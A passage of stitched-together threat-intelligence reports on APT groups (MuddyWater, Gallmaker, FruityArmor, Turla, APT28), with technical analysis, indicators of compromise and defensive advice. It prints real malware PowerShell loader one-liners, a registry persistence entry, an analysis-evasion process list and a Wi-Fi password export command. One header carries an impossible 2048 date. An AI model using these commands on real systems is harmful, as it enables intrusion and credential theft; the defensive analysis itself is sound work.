Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.
As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPWC incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.
MuddyWater expands operations
13.1.0218 Kaspersky APT
Summary
MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia, other victims were also detected in Mali, Austria, Russia, Iran and Bahrain.. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.
The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.
Previous related research:
https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1
https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/
https://www.sekoia.fr/blog/falling-on-muddywater/
Decoy images by country
Jordan
The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc
Turkey
Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety
Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)
Saudi Arabia
Document signed by the Major General Pilot, commander of the Saudi Royal Air Force
KSA King Saud University (KSU) KSA King Saud University (KSU)
Azerbaijan
İnkiºaf üçün görüº.doc (meeting for development)
Iraq
Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers
Pakistan
ECP.doc National Assembly of Pakistan.doc
P.Police.doc
Afghanistan
President.doc, E-government of Afghanistan
Technical details
Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.
The initial infection vector
The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.
Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.
The macro payload analysis, dropped files and registry keys
The macro payload, which is Base64 encoded, does the following:
Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.
\EventManager.dll
\EventManager.logs
\WindowsDefenderService.inil
Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.
Name:WindowsDefenderUpdater
Type:REG_EXPAND_SZ
Data:c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,
The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.
Case 1: INF, SCT and text files dropped by the macro
INF is launched via the advpack.dll “LaunchINFSection” function.
INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join(”,$d));
PowerShell one-liner
Encoded text file
Execution flow:
Case 2: VBS and text files dropped by the macro
The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).
powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));
PowerShell one-liner
Encoded text file
Execution flow:
The PowerShell code
When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.
The first thing the PowerShell code does is to disable office “Macro Warnings” and “Protected View“. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.
Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.
“win32_remote“,”win64_remote64“,”ollydbg“,”ProcessHacker“,”tcpview“,”autoruns“,”autorunsc“,”filemon“,”procmon“,”regmon“,”procexp“,”idaq“,”idaq64“,”ImmunityDebugger“,”Wireshark“,”dumpcap“
,”HookExplorer“,”ImportREC“,”PETools“,”LordPE“,”dumpcap“,”SysInspector“,”proc_analyzer“,”sysAnalyzer“,”sniff_hit“,”windbg“,”joeboxcontrol“,”joeboxserver“
Blacklisted process names in the malware
In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function.
CnC communication
A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.
Victim system reconnaissance
The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.
The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.
Supported commands
“upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one version to another.
The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“.
The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.
In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“.
Victimology
Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.
Attacker deception and attribution
The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:
• C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd
Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.
In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.
无法连接到网址,请等待龙…
无法访问本地计算机寄存器
任务计划程序访问被拒绝
Chinese text found in PowerShell code in multiple samples
Unable to connect to the URL, please wait for the dragon…
Unable to access local computer register
Task Scheduler access denied
Translation of Chinese text
We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.
http://www.cankayasrc[.]com/style/js/main.php
http://ektamservis[.]com/includes/main.php
http://gtme[.]ae/font-awesome/css/main.php
Recommendations for organizations
Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.
The best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.
Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object.
Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO.
A whitelisting solution to prevent certain process child-parent execution hierarchies.
Conclusion
The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.
In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:
Educate generic staff to be able to distinguish malicious behavior like phishing links.
Educate information security staff to have full configuration, investigative and hunting abilities.
Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
Make sure enterprise-grade patch management processes are well established and executed.
High-profile organizations should have elevated levels of cybersecurity, attacks against them are inevitable and are unlikely to ever cease.
Additional information
In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.
Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com
Indicators of compromise
MD5
08acd1149b09bf6455c553f512b51085
a9ec30226c83ba6d7abb8d2011cdae14
E5683fb480353c0dec333a7573710748
159238b473f80272fdcd0a8ddf336a91
16ac1a2c1e1c3b49e1a3a48fb71cc74f
1b086ab28e3d6f73c6605f9ae087ad4a
23c82e8c028af5c64cbe37314732ec19
24e1bd221ba3813ed7b6056136237587
2e82e242cb0684b98a8f6f2c0e8a12f3
37f7e6e5f073508e1ee552ebea5d200e
3bb14adb551663fd2328d59f653ba757
3c2a0d6d0ecf06f1be9ad411d06f7ba8
4c5a5c236c9f4480b3d725f297673fad
4f873578956d2790101443f24e4bd4d3
5466c8a099d1d30096775b1f4357d3cf
59502e209aedf80e170e653306ca1553
5a42a712e3b3cfa1db32d9e3d832f8f1
5bd61a94e7698574eaf82ef277316463
5de97ae178888f2dd222bb8a66060ac2
665947cf7037a6772687b69279753cdf
7a2ff07283ddc69d9f34cfa0d3c936d4
7beb94f602e97785370fec2d059d54a5
801f34abbf90ac2b4fb4b6289830cd16
864d6321be50f29e7a7a4bfab746245a
8a36d91ca331f62642dbcafc2ea1b1ab
9486593e4fb5a4d440093d54a3519187
94edf251b5fe7cc19488b5f0c3c3e359
9c6648cedeb3f5d9f6d104e638bd0c3d
9f4044674100a8c28f9ed1b336c337ce
aa1e8d0e1c4d4eb9984124df003ea7f2
aa564e207926d06b8a59ba50ca2c543d
ab4f947f4649b9ec28d182b02778aa69
ad92ccf85ec170f340457d33bbb81df5
b8939fa58fad8aa1ec271f6dae0b7255
bb476622bcb0c666e12fbe4ccda8bbef
be62fc5b1576e0a8491519e10bab931d
bf310319d6ef95f69a45fc4f2d237ed4
c375bbf248592cee1a1999227457c300
c73fc71ee35e99230941f03fc32934d9
c8b0458c384fd34971875b1c753c9c7c
cd371d1d3bd7c8e2110587cfa8b7eaea
ce2df2907ce543438c19cfaf6c14f699
d15aee026074fbd18f780fb51ec0632a
d632c8444aab1b43a663401e80c0bac4
d6acee43d61cbd4bcd7a5bdf4ed9b343
e3e25957b738968befcf2333aa637d97
e5683fb480353c0dec333a7573710748
eb69fb45feb97af81c2f306564acc2da
f00fd318bf58586c29ab970132d1fd2a
f2b5373f32a4b9b3d34701ff973ba69c
f84914c30ae4e6b9b1f23d5c01e001ed
faa4469d5cd90623312c86d651f2d930
Ffb8ea0347a3af3dd2ab1b4e5a1be18a
345b1ea293764df86506f97ba498cc5e
029cb7e622f4eb0d058d577c9d322e92
06178b5181f30ce00cd55e2690f667ac
2b8ab9112e34bb910055d85ec800db3f
47ec75d3290add179ac5218d193bb9a8
befc203d7fa4c91326791a73e6d6b4da
C561e81e30316208925bfddb3cf3360a
132efd7b3bdfb591c1bf2a4e19c710eb
e7a6c57566d9523daa57fe16f52e377e
c0e35c4523a7931f4c99616d6079fd14
245fa82c89875b70c2669921d4ba14d3
File names
%SystemDrive%\ProgramData\EventManager.dll
%SystemDrive%\ProgramData\EventManager.logs
%SystemDrive%\ProgramData\WindowsDefenderService.ini
%SystemDrive%\ProgramData\Defender.sct
%SystemDrive%\ProgramData\DefenderService.inf
%SystemDrive%\ProgramData\WindowsDefender.ini
%SystemDrive%\ProgramData\ZIPSDK\InstallConfNT.vbs
%SystemDrive%\ProgramData\ZIPSDK\ProjectConfManagerNT.ini
%SystemDrive%\ProgramData\WindowsDefenderTask.ini
%SystemDrive%\ProgramData\WindowsDefenderTask.txt
%SystemDrive%\ProgramData\WindowsDefenderTask.xml
%SystemDrive%\ProgramData\DefenderNT\ConfigRegister.vbs
%SystemDrive%\ProgramData\DefenderNT\SetupConf.ini
%SystemDrive%\ProgramData\ASDKiMalwareSDK\ProjectConfSDK.vbs
%SystemDrive%\ProgramData\ASDKiMalwareSDK\SetupConfSDK.ini
%SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.ini
%SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.vbs
%SystemDrive%\ProgramData\OneDrive.dll
%SystemDrive%\ProgramData\OneDrive.html
%SystemDrive%\ProgramData\OneDrive.ini
%SystemDrive%\ProgramData\WindowsNT\WindowsNT.ini
%SystemDrive%\ProgramData\WindowsNT\WindowsNT.vbs
%SystemDrive%\ProgramData\SYSTEM32SDK\ConfManagerNT.vbs
%SystemDrive%\ProgramData\SYSTEM32SDK\ProjectConfManagerNT.ini
%windir%\System32\Tasks\Microsoft\WindowsDefenderUpdater
%windir%\System32\Tasks\Microsoft\MicrosoftOneDrive
%windir%\System32\Tasks\Microsoft\WindowsDifenderUpdate
%windir%\System32\Tasks\Microsoft\WindowsSystem32SDK
%windir%\System32\Tasks\Microsoft\WindowsDefenderSDK
%windir%\System32\Tasks\Microsoft\WindowsMalwareDefenderSDK
%windir%\System32\Tasks\Microsoft\WindowsMalwareByteSDK
Domains, URLs and IP addresses
http://www.cankayasrc[.]com/style/js/main.php
http://ektamservis[.]com/includes/main.php
http://gtme[.]ae/font-awesome/css/main.php
https://www.adfg[.]ae/wp-includes/widgets/main.php
http://adibf[.]ae/wp-includes/js/main.php
http://hubinasia[.]com/wp-includes/widgets/main.php
https://benangin[.]com/wp-includes/widgets/main.php
104.237.233.60
104.237.255.212
104.237.233.40
5.9.0.155
New Gallmaker APT group eschews malware in cyber espionage campaigns
11.10.2018 securityaffairs APT
A previously unknown cyber espionage group, tracked as Gallmaker, has been targeting entities in the government, military and defense sectors since at least 2017.
A new cyber espionage group tracked as Gallmaker appeared in the threat landscape. According to researchers from Symantec, who first spotted the threat actor, the group has launched attacks on several overseas embassies of an unnamed Eastern European country, and military and defense organizations in the Middle East.
Gallmaker is a politically motivated APT group that focused its surgical operations on the government, military or defense sectors.
Gallmaker been active since at least December 2017, researchers observed a spike in its operations in April and most recent attacks were uncovered in June.
The experts speculate the threat a nation-state actor, it is interesting to note that the APT is relying entirely on code scraped from the public internet.
“This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign,” reads the analysis published by Symantec.
“The most interesting aspect of Gallmaker’s approach is that the group doesn’t use malware in its operations. Rather, the attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools.”
Gallmaker uses spear phishing messages using a weaponized Office document that uses the Dynamic Update Exchange (DDE) protocol to execute commands in the memory of the targeted device.
“These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective.” continues Symantec.
“By running solely in memory, the attackers avoid leaving artifacts on disk, which makes their activities difficult to detect.”
Once the attackers gain access to a target machine, they use various tools including the reverse_tcp reverse shell from Metasploit, the WindowsRoamingToolsTask PowerShell scheduler, the WinZip console, and an open source library named Rex PowerShell, which helps create PowerShell scripts for Metasploit exploits.
Experts discovered that Gallmaker APT is using three primary IP addresses for its C&C infrastructure, they also noticed the attackers use to delete some of its tools from compromised machines once it is completed the attack, likely to hide traces of their activity.
“The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect. We have written extensively about the increasing use of LotL tools and publicly available hack tools by cyber criminals.” concluded Symantec. “One of the primary reasons for the increased popularity of these kinds of tools is to avoid detection; attackers are hoping to “hide in plain sight”, with their malicious activity hidden in a sea of legitimate processes.”
CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
10.10.2018 securityaffairs APT Vulnerebility
A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.
The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.
The flaw, tracked as CVE-2018-8453, affects the Win32k component of Windows handles objects in memory.
The flaw was discovered by experts from Kaspersky Lab could be exploited by an authenticated attacker to take control of an affected system.
Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.
Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.
Experts believe FruityArmor´s activity has been slowly increasing during the last two years.
The zero-day exploit was included by malware installer used by the group to escalate privileges on the target machine and to gain persistence.
The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.”
“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.
“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”
The zero-day resembles an older vulnerability tracked as CVE-2017-0263 that was fixed by Microsoft in May 2017 and that it had been exploited by the Russia-linked cyberespionage group tracked as APT28.
The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.
“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.
The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.
Further technical details are reported by Kaspersky experts in their analysis.
Shedding Skin – Turla’s Fresh Faces
8.10.2048 Kaspersky APT
Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.
Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized PoshSec-Mod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.
For a first, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting in development efforts in WhiteAtlas and WhiteBear. And, we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques for a first time as well.
Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.
And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.
Essentially, we are discussing ongoing activity revolving around several malware families:
KopiLuwak and IcedCoffeer
Carbon
Mosquito
WhiteBear
Technical Rattle
Turla’s Shifting to Scripting
KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas
Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.
IcedCoffee
Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.
IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.
KopiLuwak
In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.
The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.
Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.
The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a
Windows shortcut (.lnk) file. The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.
Carbon – the long tail
Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.
The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.
We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.
.JS attachments deliver Skipper/WhiteAtlas and WhiteBear
We introduced WhiteBear actionable data to our private customers early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follows up on initial WhiteAtlas scripting development and deployment efforts.
Mosquito’s Changing 2018 Delivery Techniques
In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.
The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:
And here is the default Posh-SecMod code that they ripped from:
We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.
MiTM and Ducking the Mosquito Net
We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:
hxxp://admdownload.adobe[.]com/bin/live/flashplayer23ax_ra_install.exe
While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.
But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.
google_update_checker.js
local_update_checker.js
So, we should consider the wifi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:
cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"
They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.
The Next Strike
It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.
Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.
From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.
And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, and more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with borrowed techniques from the previous zebrocy spearphishing, techniques are sometimes passed around and duplicated.
APT28 group return to covert intelligence gathering ops in Europe and South America.
8.10.2018 securityaffairs APT
Experts from Symantec collected evidence that APT28 group returns to covert intelligence gathering operations in Europe and South America.
APT28 state-sponsored group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) seems to have shifted the focus for its operations away from election interference to cyber espionage activities.
The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.
